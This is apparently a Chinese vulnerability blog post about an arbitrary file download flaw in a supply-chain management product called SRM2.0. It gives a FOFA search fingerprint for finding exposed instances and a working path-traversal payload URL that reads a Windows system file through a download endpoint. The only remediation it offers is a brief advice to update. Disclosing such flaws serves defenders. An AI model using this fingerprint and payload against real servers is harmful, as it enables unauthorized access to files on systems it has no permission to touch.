当前位置: 首页 > news >正文

某云彩SRM2.0任意文件下载漏洞

文章目录

    • 免责申明
    • 搜索语法
    • 漏洞描述
    • 漏洞复现
    • 修复建议

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

icon_hash="1665918155"

在这里插入图片描述

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。
该系统download在接口处存在任意文件下载漏洞

漏洞复现

payload

http://ip/adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=C:\Windows\System32\drivers\etc\hosts

在这里插入图片描述
在这里插入图片描述

修复建议

更新到最新版本

相关文章:

  • OpenGL知识点记录
  • 使用 GZCTF 结合 GitHub 仓库搭建独立容器与动态 Flag 的 CTF 靶场+基于 Docker 的 Web 出题与部署+容器权限控制
  • RabbitMQ 入门教程
  • 把时间当作朋友
  • Hive时间窗口函数保姆级教程(最全解析、应用和优化)(持续更新)
  • C语言学习笔记 Day16(C10文件管理--下)
  • 《机器学习》文本数据分析之关键词提取、TF-IDF、项目实现 <上>
  • 移情别恋c++ ദ്ദി˶ー̀֊ー́ ) ——10.继承
  • CCF-CSP 2024 --重塑矩阵1,2c语言题解
  • 网络编程9.3
  • 基础学习之——Kubernetes
  • vscode好用的快捷键整理~
  • 基础学习之——Docker Compose的安装和使用
  • 不管夫妻还是情人,想要长相厮守、生活幸福美满,就这两个字!
  • 宁波银行资产规模首超3万亿,高成长性被机构清一色看好
  • (十五)java多线程之并发集合ArrayBlockingQueue
  • 2017-09-12 前端日报
  • Android系统模拟器绘制实现概述
  • classpath对获取配置文件的影响
  • IndexedDB
  • IOS评论框不贴底(ios12新bug)
  • java 多线程基础, 我觉得还是有必要看看的
  • JavaScript HTML DOM
  • JavaScript设计模式之工厂模式
  • Linux CTF 逆向入门
  • MyEclipse 8.0 GA 搭建 Struts2 + Spring2 + Hibernate3 (测试)
  • Promise面试题2实现异步串行执行
  • V4L2视频输入框架概述
  • vuex 笔记整理
  • webgl (原生)基础入门指南【一】
  • 从零搭建Koa2 Server
  • 读懂package.json -- 依赖管理
  • 工作踩坑系列——https访问遇到“已阻止载入混合活动内容”
  • 汉诺塔算法
  • 七牛云 DV OV EV SSL 证书上线,限时折扣低至 6.75 折!
  • 前端每日实战:70# 视频演示如何用纯 CSS 创作一只徘徊的果冻怪兽
  • 前端设计模式
  • 手写双向链表LinkedList的几个常用功能
  • 思维导图—你不知道的JavaScript中卷
  • 我的面试准备过程--容器(更新中)
  • 我看到的前端
  • #define MODIFY_REG(REG, CLEARMASK, SETMASK)
  • #NOIP 2014# day.1 生活大爆炸版 石头剪刀布
  • #常见电池型号介绍 常见电池尺寸是多少【详解】
  • $.ajax,axios,fetch三种ajax请求的区别
  • (3)Dubbo启动时qos-server can not bind localhost22222错误解决
  • (C#)获取字符编码的类
  • (Oracle)SQL优化基础(三):看懂执行计划顺序
  • (STM32笔记)九、RCC时钟树与时钟 第二部分
  • (附源码)ssm高校升本考试管理系统 毕业设计 201631
  • (回溯) LeetCode 46. 全排列
  • (幽默漫画)有个程序员老公,是怎样的体验?
  • **CI中自动类加载的用法总结
  • .ai域名是什么后缀?
  • .apk文件,IIS不支持下载解决